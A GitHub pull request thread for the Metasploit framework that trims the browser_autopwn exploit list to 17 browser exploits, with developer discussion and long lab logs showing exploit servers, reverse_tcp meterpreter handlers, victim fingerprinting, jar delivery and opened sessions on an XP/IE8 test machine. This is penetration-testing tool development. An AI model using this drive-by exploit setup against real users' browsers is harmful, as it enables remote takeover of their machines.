Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Reduce number of modules available on BrowserAutopwn #2634

Merged
merged 3 commits into from Nov 19, 2013

Conversation

jvazquez-r7
Copy link
Contributor

List reduced to 17 modules:

msf auxiliary(browser_autopwn) > rexploit
[*] Reloading module...
[*] Auxiliary module execution completed

[*] Setup
[*] Obfuscating initial javascript 2013-11-12 12:33:12 -0600
[*] Done in 1.037251 seconds

[*] Starting exploit modules on host 192.168.172.1...
[*] ---

msf auxiliary(browser_autopwn) > [*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/NOnWoopyH
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/TrgIFKGRbHg
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/RNryXHIBpy
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/cWkELkiz
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/ByuPks
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/mNzjIIBKZ
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.172.1:8080/WIVtsl
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/BrRIp
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/lRKPyYTKG
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/ycnUkGouizWN
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/tNPPusP
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/EZuZnruoOdWv
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/rfFuEe
[*] Server started.
[*] Starting exploit windows/browser/ms12_004_midi with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/boVLVVcAMm
[*] Server started.
[*] Starting exploit windows/browser/ms13_037_svg_dashstyle with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/imIljc
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/TmgRiG
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.172.1:8080/ZZEvkeGhkZA
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.172.1:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.172.1:6666
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.172.1:7777
[*] Starting the payload handler...

[*] --- Done, found 17 exploit modules

Still getting sessions according to test on xpsp3 / ie8 / java 6 old relsease:

msf auxiliary(browser_autopwn) > sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter java/java  Administrator @ juan-c0de875735                  192.168.172.1:7777 -> 192.168.172.244:1114 (192.168.172.244)
  2   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.172.1:3333 -> 192.168.172.244:1128 (192.168.172.244)

The list of modules is build based on recent threats:

http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html
http://www.deependresearch.org/2012/11/common-exploit-kits-2012-poster.html

List of modules:

exploits/multi/browser/java_atomicreferencearray.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/multi/browser/java_jre17_jmxbean.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/multi/browser/java_jre17_provider_skeleton.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/multi/browser/java_jre17_reflection_types.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/multi/browser/java_rhino.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/multi/browser/java_verifier_field_access.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/multi/browser/opera_configoverwrite.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/windows/browser/adobe_flash_mp4_cprt.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/windows/browser/adobe_flash_rtmp.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/windows/browser/ie_cgenericelement_uaf.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/windows/browser/ie_createobject.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/windows/browser/ie_execcommand_uaf.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/windows/browser/mozilla_nstreerange.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/windows/browser/ms12_004_midi.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/windows/browser/ms13_037_svg_dashstyle.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/windows/browser/ms13_080_cdisplaypointer.rb:  include Msf::Exploit::Remote::BrowserAutopwn
exploits/windows/browser/msxml_get_definition_code_exec.rb:  include Msf::Exploit::Remote::BrowserAutopwn

Sure the list isn't perfect, but hope is better than the current list of sixty and other modules, which is an huge list. Additions / Deletions are welcome of course :)

@wchen-r7
Copy link
Contributor

I actually recommend depreciating exploits/windows/browser/ms12_004_midi.rb because in my opinion all the other similar ones are better than it.

The Java ones seem to cover similar targets. If I recall correctly, java_jre17_provider_skeleton.rb covers 7u21, and is more up to date than other java_jre17_xxxx modules. If other java_jre17_xxxx modules actually cover different targets, then yes we should keep them. If not, I'd say yank them.

@todb-r7
Copy link

todb-r7 commented Nov 12, 2013

As long as we have something for ancient machines (which is the bread and butter of pentesting for exploits), ya, let's keep the list light. I don't think it's punitive or anything -- just a tradeoff for a more rapid start up time and slightly fewer chances to get fingerprinted and blocked, vs exhaustive lists.

@jvazquez-r7
Copy link
Contributor Author

@wchen-r7

  • I've let ms12-004 because it's exploited on the wild, covering also IE6 and is more recent than older ie exploits.
  • java_jre17_provider_skeleton covers 7u21 but doesn't come with click2pay bypass, because of that java_jre17_reflection_types is added (has click2pay). java_jre17_jmxbean is added because looks like very common across exploit kits. Since java is one of most used technologies for exploiting todays, thing which worths to add these modules to autopwn. But I wouldn't be hurt by deleting java_jre17_jmxbean indeed.

Votes to delete for java_jre17_jmxbean? something else?

@todb-r7 I think coverage of these modules should be good enough. If anyone has some module in mind which shouldn't be deleted, just propose :)

Would love @jlee-r7 opinion about the list / deletions.

@wchen-r7
Copy link
Contributor

PR needs an update. Probably because the aladdin module.

@jlee-r7
Copy link
Contributor

jlee-r7 commented Nov 13, 2013

Doesn't ms13_080_cdisplaypointer cover all the same IE versions as ms13_037_svg_dashstyle and more?

@wchen-r7
Copy link
Contributor

Yes it does. But I think the point Juan is trying to make is that we want to deploy whatever other exploit kits are using. If you just want target coverage, you won't have to load as many modules for sure.

@jlee-r7
Copy link
Contributor

jlee-r7 commented Nov 13, 2013

I think target coverage is more important than trying to mimic what others are doing.

@kernelsmith
Copy link
Contributor

++ on target coverage over exploit kit emulation

On Thu, Nov 14, 2013 at 5:23 AM, jlee-r7 notifications@github.com wrote:

I think target coverage is more important than trying to mimic what others
are doing.


Reply to this email directly or view it on GitHubhttps://github.com//pull/2634#issuecomment-28430357
.

  • Josh

@jvazquez-r7
Copy link
Contributor Author

@jlee-r7 right ms13_080_cdisplaypointer cover all the same IE versions as ms13_037_svg_dashstyle and more but ms13_037_svg_dashstyle provides ASLR bypass without office / java (or other non aslr modules). Because of that, decided to allow ms13_037_svg_dashstyle live on browser_autopwn. But now reviewing, the :jre target is the default one, so aslr bypass via leak only available under user decision.... so I can delete if all you feel comfortable.

@jlee-r7
Copy link
Contributor

jlee-r7 commented Nov 14, 2013

Maybe make the leak target the default? Is there a reason it isn't already?

@wchen-r7
Copy link
Contributor

The leak relies on ntdll, and the module only covers two versions of ntdll. Although it doesn't change very often, we just don't know for sure how many different versions are out there, so we decided maybe it's safer not to make it as default.

@jlee-r7
Copy link
Contributor

jlee-r7 commented Nov 14, 2013

Ok, that makes sense.

@jvazquez-r7
Copy link
Contributor Author

Basically the reason is the one explained by @wchen-r7, and even when I reviewed and just found these ntdll versions prior to the ms13_037 patch, hope I didn't forget nothing. Because of that we use to avoid the leaks as default targets when they rely on specific dll versions / fingerprinting and use prebuild rop chains.

@jvazquez-r7
Copy link
Contributor Author

Okey, since has sense for @jlee-r7 keep the :jre target as default, just deleting ms13_037_svg_dashstyle from the browser autopwn list, indeed it was in the list because of the info leak to bypass aslr.

@Meatballs1
Copy link
Contributor

Wouldn't it be better to have more customization in the module itself and leave all of them available to be included? You can then ship the default customization as a decent starting point but if people want ALL they can tick the all box (or however the options are customized) or add in specific modules?

@wchen-r7
Copy link
Contributor

Would be nice to do something like, I've actually thought about that before too. My version of the idea is that the module provides more customization whitelisting which modules to run, or you can choose pre-configured options: You can do all Java, or IE, all recent added modules, or mimic other exploit kits. Just an idea, no actual implementation yet.

@wchen-r7
Copy link
Contributor

Tested on rspec and runs fine in msfconsole. Need someone from Pro to test this right quick to make sure this doesn't affect Pro in a negative way.

@jvazquez-r7
Copy link
Contributor Author

Giving a chance to MSF PRO. I'm going to try campaign + browser_autopwn as requested by @wchen-r7 (sorry my msfpro expertise is weird.... so I'm going just to see what can be done :))

@todb
Copy link
Contributor

todb commented Nov 18, 2013

Best way to tag pro is mention someone by name, like @shuckins-r7
On Nov 18, 2013 1:44 PM, "Juan Vazquez" notifications@github.com wrote:

Giving a chance to MSF PRO. I'm going to try campaign + browser_autopwn as
requested by @wchen-r7 https://github.com/wchen-r7 (sorry my msfpro
expertise is weird.... so I'm going just to see what can be done :))


Reply to this email directly or view it on GitHubhttps://github.com//pull/2634#issuecomment-28730816
.

@jvazquez-r7
Copy link
Contributor Author

Tested pro by myself:

  • git checkout metasploit-framework to this pull request branch
  • install msf pro
  • link the pro msf3's folder to the metasploit-framework on point 1
  • restart pro services
  • Create a new campaign, web type, browser autopwn and run it

Task Output:

  • Autopwn startup
[*] [2013.11.18-12:27:38] Setup
[*] [2013.11.18-12:27:38] Obfuscating initial javascript 2013-11-18 12:27:38 -0800
[*] [2013.11.18-12:27:41] Done in 2.950238913 seconds
[*] [2013.11.18-12:27:42] Starting exploit modules on host 192.168.172.133...
[*] [2013.11.18-12:27:42] ---
[*] [2013.11.18-12:27:54] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] [2013.11.18-12:27:55] Using URL: http://192.168.172.133:8081/QfIQsXoua
[*] [2013.11.18-12:27:55] Server started.
[*] [2013.11.18-12:28:08] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] [2013.11.18-12:28:09] Using URL: http://192.168.172.133:8081/eGvrqYZiirFI
[*] [2013.11.18-12:28:09] Server started.
[*] [2013.11.18-12:28:20] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] [2013.11.18-12:28:21] Using URL: http://192.168.172.133:8081/dCnMRYXr
[*] [2013.11.18-12:28:21] Server started.
[*] [2013.11.18-12:28:35] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] [2013.11.18-12:28:36] Using URL: http://192.168.172.133:8081/XWXvi
[*] [2013.11.18-12:28:36] Server started.
[*] [2013.11.18-12:28:48] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] [2013.11.18-12:28:48] Using URL: http://192.168.172.133:8081/MWNMnsMRuG
[*] [2013.11.18-12:28:48] Server started.
[*] [2013.11.18-12:28:58] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] [2013.11.18-12:28:58] Using URL: http://192.168.172.133:8081/OxAetKiuQ
[*] [2013.11.18-12:28:58] Server started.
[*] [2013.11.18-12:29:05] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] [2013.11.18-12:29:06] Using URL: http://192.168.172.133:8081/PzEQMgZ
[*] [2013.11.18-12:29:06] Server started.
[*] [2013.11.18-12:29:14] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] [2013.11.18-12:29:14] Using URL: http://192.168.172.133:8081/dyuVmgPFMWd
[*] [2013.11.18-12:29:14] Server started.
[*] [2013.11.18-12:29:21] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] [2013.11.18-12:29:21] Using URL: http://192.168.172.133:8081/xBFAuBAdM
[*] [2013.11.18-12:29:21] Server started.
[*] [2013.11.18-12:29:29] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] [2013.11.18-12:29:29] Using URL: http://192.168.172.133:8081/cBifUVNmO
[*] [2013.11.18-12:29:29] Server started.
[*] [2013.11.18-12:29:36] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] [2013.11.18-12:29:36] Using URL: http://192.168.172.133:8081/ApflYprQdGkvH
[*] [2013.11.18-12:29:36] Server started.
[*] [2013.11.18-12:29:44] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] [2013.11.18-12:29:44] Using URL: http://192.168.172.133:8081/DpZMfeHiALA
[*] [2013.11.18-12:29:44] Server started.
[*] [2013.11.18-12:29:51] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] [2013.11.18-12:29:52] Using URL: http://192.168.172.133:8081/lXhmBh
[*] [2013.11.18-12:29:52] Server started.
[*] [2013.11.18-12:30:00] Starting exploit windows/browser/ms12_004_midi with payload windows/meterpreter/reverse_tcp
[*] [2013.11.18-12:30:00] Using URL: http://192.168.172.133:8081/MEeKcgbTln
[*] [2013.11.18-12:30:00] Server started.
[*] [2013.11.18-12:30:07] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] [2013.11.18-12:30:07] Using URL: http://192.168.172.133:8081/kqaKjMXwuPE
[*] [2013.11.18-12:30:07] Server started.
[*] [2013.11.18-12:30:15] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] [2013.11.18-12:30:15] Using URL: http://192.168.172.133:8081/EWQinINchSjtM
[*] [2013.11.18-12:30:15] Server started.
[*] [2013.11.18-12:30:15] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] [2013.11.18-12:30:15] Starting handler for generic/shell_reverse_tcp on port 6666
[*] [2013.11.18-12:30:15] Started reverse handler on 192.168.172.133:3333
[*] [2013.11.18-12:30:16] Starting the payload handler...
[*] [2013.11.18-12:30:18] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] [2013.11.18-12:30:18] Started reverse handler on 192.168.172.133:6666
[*] [2013.11.18-12:30:19] Starting the payload handler...
[*] [2013.11.18-12:30:19] Started reverse handler on 192.168.172.133:7777
[*] [2013.11.18-12:30:19] Starting the payload handler...
[*] [2013.11.18-12:30:19] --- Done, found 16 exploit modules
[*] [2013.11.18-12:30:19] Using URL: http://192.168.172.133:8081/amazing91
  • getting sessions, even when I see some errors displayed I hope they are due to the substitution I've done of the internal msf3 dir, maybe someone on pro (@shuckins-r7) would like to verify:
[*] [2013.11.18-12:30:19] Using URL: http://192.168.172.133:8081/amazing91
[*] [2013.11.18-12:30:19] Server started.
[*] [2013.11.18-12:32:51] 192.168.172.134 browser_autopwn - Handling '/amazing91'
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - Handling '/amazing91?sessid=TWljcm9zb2Z0IFdpbmRvd3M6WFA6U1AzOmVuLXVzOng4NjpNU0lFOjguMDo%3d'
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - JavaScript Report: Microsoft Windows:XP:SP3:en-us:x86:MSIE:8.0:
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - Reporting: {:os_name=>"Microsoft Windows", :os_flavor=>"XP", :os_sp=>"SP3", :os_lang=>"en-us", :arch=>"x86"}
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - Rejecting exploits for Opera
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - Rejecting exploits for Firefox
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - Responding with 14 exploits
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * multi/browser/java_atomicreferencearray
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * multi/browser/java_jre17_jmxbean
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * multi/browser/java_jre17_reflection_types
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * multi/browser/java_rhino
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * multi/browser/java_verifier_field_access
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * windows/browser/ie_createobject
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * multi/browser/java_jre17_provider_skeleton
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * windows/browser/ie_cgenericelement_uaf
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * windows/browser/ie_execcommand_uaf
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * windows/browser/msxml_get_definition_code_exec
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * windows/browser/adobe_flash_mp4_cprt
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * windows/browser/adobe_flash_rtmp
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * windows/browser/ms12_004_midi
[*] [2013.11.18-12:32:52] 192.168.172.134 browser_autopwn - 192.168.172.134 browser_autopwn - * windows/browser/ms13_080_cdisplaypointer
[*] [2013.11.18-12:32:52] 192.168.172.134 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] [2013.11.18-12:32:52] 192.168.172.134 java_atomicreferencearray - Generated jar to drop (5489 bytes).
[*] [2013.11.18-12:32:54] 192.168.172.134 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] [2013.11.18-12:32:54] 192.168.172.134 java_atomicreferencearray - Generated jar to drop (5489 bytes).
[*] [2013.11.18-12:32:54] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI
[*] [2013.11.18-12:32:54] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/
[*] [2013.11.18-12:32:54] 192.168.172.134 java_atomicreferencearray - Sending jar
[*] [2013.11.18-12:32:54] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/aFjzudoY.jar
[*] [2013.11.18-12:32:54] 192.168.172.134 java_atomicreferencearray - Sending jar
[*] [2013.11.18-12:32:54] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/aFjzudoY.jar
[*] [2013.11.18-12:32:55] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI
[*] [2013.11.18-12:32:55] 192.168.172.134 java_jre17_reflection_types - handling request for /XWXvi
[*] [2013.11.18-12:32:55] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/
[*] [2013.11.18-12:32:55] 192.168.172.134 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] [2013.11.18-12:32:55] 192.168.172.134 java_atomicreferencearray - Generated jar to drop (5489 bytes).
[*] [2013.11.18-12:32:55] 192.168.172.134 java_jre17_reflection_types - handling request for /XWXvi/
[*] [2013.11.18-12:32:55] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/iGLWIKAO.jar
[*] [2013.11.18-12:32:55] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/iGLWIKAO.jar
[*] [2013.11.18-12:32:56] 192.168.172.134 java_atomicreferencearray - Sending jar
[*] [2013.11.18-12:32:56] 192.168.172.134 java_atomicreferencearray - Sending jar
[*] [2013.11.18-12:32:56] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI
[*] [2013.11.18-12:32:56] 192.168.172.134 java_jre17_reflection_types - handling request for /XWXvi
[*] [2013.11.18-12:32:56] 192.168.172.134 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] [2013.11.18-12:32:56] 192.168.172.134 java_atomicreferencearray - Generated jar to drop (5489 bytes).
[*] [2013.11.18-12:32:56] 192.168.172.134 java_jre17_reflection_types - handling request for /XWXvi/
[*] [2013.11.18-12:32:56] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/
[*] [2013.11.18-12:32:56] 192.168.172.134 java_atomicreferencearray - Sending jar
[*] [2013.11.18-12:32:56] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:32:56] 192.168.172.134 java_atomicreferencearray - Sending jar
[*] [2013.11.18-12:32:56] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/BxeafcMk.jar
[*] [2013.11.18-12:32:56] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/BxeafcMk.jar
[*] [2013.11.18-12:32:57] 192.168.172.134 java_rhino - Sending Applet.jar
[*] [2013.11.18-12:32:57] 192.168.172.134 java_rhino - Sending Applet.jar
[*] [2013.11.18-12:32:57] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:32:57] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:32:57] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:32:57] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI
[*] [2013.11.18-12:32:57] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:32:57] 192.168.172.134 java_jre17_reflection_types - handling request for /XWXvi
[*] [2013.11.18-12:32:57] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/
[*] [2013.11.18-12:32:58] 192.168.172.134 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] [2013.11.18-12:32:58] 192.168.172.134 java_atomicreferencearray - Generated jar to drop (5489 bytes).
[*] [2013.11.18-12:32:58] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:32:58] 192.168.172.134 java_jre17_reflection_types - handling request for /XWXvi/
[*] [2013.11.18-12:32:58] 192.168.172.134 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] [2013.11.18-12:32:58] 192.168.172.134 java_verifier_field_access - Generated jar to drop (5489 bytes).
[*] [2013.11.18-12:32:58] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/ixfpMcnh.jar
[*] [2013.11.18-12:32:58] 192.168.172.134 java_atomicreferencearray - Sending jar
[*] [2013.11.18-12:32:58] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/ixfpMcnh.jar
[*] [2013.11.18-12:32:58] 192.168.172.134 java_atomicreferencearray - Sending jar
[*] [2013.11.18-12:32:58] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:32:58] 192.168.172.134 java_verifier_field_access - Sending jar
[*] [2013.11.18-12:32:58] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:32:58] 192.168.172.134 java_verifier_field_access - Sending jar
[*] [2013.11.18-12:32:58] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:32:58] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:32:59] Sending stage (30355 bytes) to 192.168.172.134
[*] [2013.11.18-12:32:59] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI
[*] [2013.11.18-12:32:59] 192.168.172.134 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] [2013.11.18-12:32:59] 192.168.172.134 java_atomicreferencearray - Generated jar to drop (5489 bytes).
[*] [2013.11.18-12:32:59] 192.168.172.134 java_jre17_reflection_types - handling request for /XWXvi
[*] [2013.11.18-12:32:59] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/
[*] [2013.11.18-12:32:59] 192.168.172.134 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] [2013.11.18-12:32:59] 192.168.172.134 java_verifier_field_access - Generated jar to drop (5489 bytes).
[*] [2013.11.18-12:32:59] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:32:59] 192.168.172.134 java_jre17_provider_skeleton - handling request for /dCnMRYXr
[*] [2013.11.18-12:32:59] 192.168.172.134 java_jre17_reflection_types - handling request for /XWXvi/
[*] [2013.11.18-12:32:59] 192.168.172.134 java_jre17_provider_skeleton - handling request for /dCnMRYXr/
[*] [2013.11.18-12:32:59] 192.168.172.134 java_atomicreferencearray - Sending jar
[*] [2013.11.18-12:32:59] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/XnlPLXjV.jar
[*] [2013.11.18-12:32:59] 192.168.172.134 java_verifier_field_access - Sending jar
[*] [2013.11.18-12:33:00] 192.168.172.134 java_atomicreferencearray - Sending jar
[*] [2013.11.18-12:33:00] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/XnlPLXjV.jar
[*] [2013.11.18-12:33:00] 192.168.172.134 java_jre17_provider_skeleton - handling request for /dCnMRYXr/oatcKx.jar
[*] [2013.11.18-12:33:00] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:33:00] 192.168.172.134 java_verifier_field_access - Sending jar
[*] [2013.11.18-12:33:00] 192.168.172.134 java_jre17_provider_skeleton - handling request for /dCnMRYXr/oatcKx.jar
[*] [2013.11.18-12:33:00] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:33:00] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:33:00] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:33:00] Sending stage (30355 bytes) to 192.168.172.134
[*] [2013.11.18-12:33:01] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI
[*] [2013.11.18-12:33:01] 192.168.172.134 java_jre17_reflection_types - handling request for /XWXvi
[*] [2013.11.18-12:33:01] 192.168.172.134 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] [2013.11.18-12:33:01] 192.168.172.134 java_atomicreferencearray - Generated jar to drop (5489 bytes).
[*] [2013.11.18-12:33:01] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/
[*] [2013.11.18-12:33:01] 192.168.172.134 java_jre17_reflection_types - handling request for /XWXvi/
[*] [2013.11.18-12:33:02] 192.168.172.134 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] [2013.11.18-12:33:02] 192.168.172.134 java_verifier_field_access - Generated jar to drop (5489 bytes).
[-] [2013.11.18-12:33:02] 192.168.172.134 java_atomicreferencearray - Exception handling request: Connection reset by peer
[*] [2013.11.18-12:33:02] 192.168.172.134 java_jre17_provider_skeleton - handling request for /dCnMRYXr
[-] [2013.11.18-12:33:02] 192.168.172.134 java_atomicreferencearray - Exception handling request: Connection reset by peer
[*] [2013.11.18-12:33:02] 192.168.172.134 ie_cgenericelement_uaf - Requesting: /cBifUVNmO
[*] [2013.11.18-12:33:02] 192.168.172.134 ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3
[*] [2013.11.18-12:33:02] 192.168.172.134 ie_cgenericelement_uaf - Sending HTML...
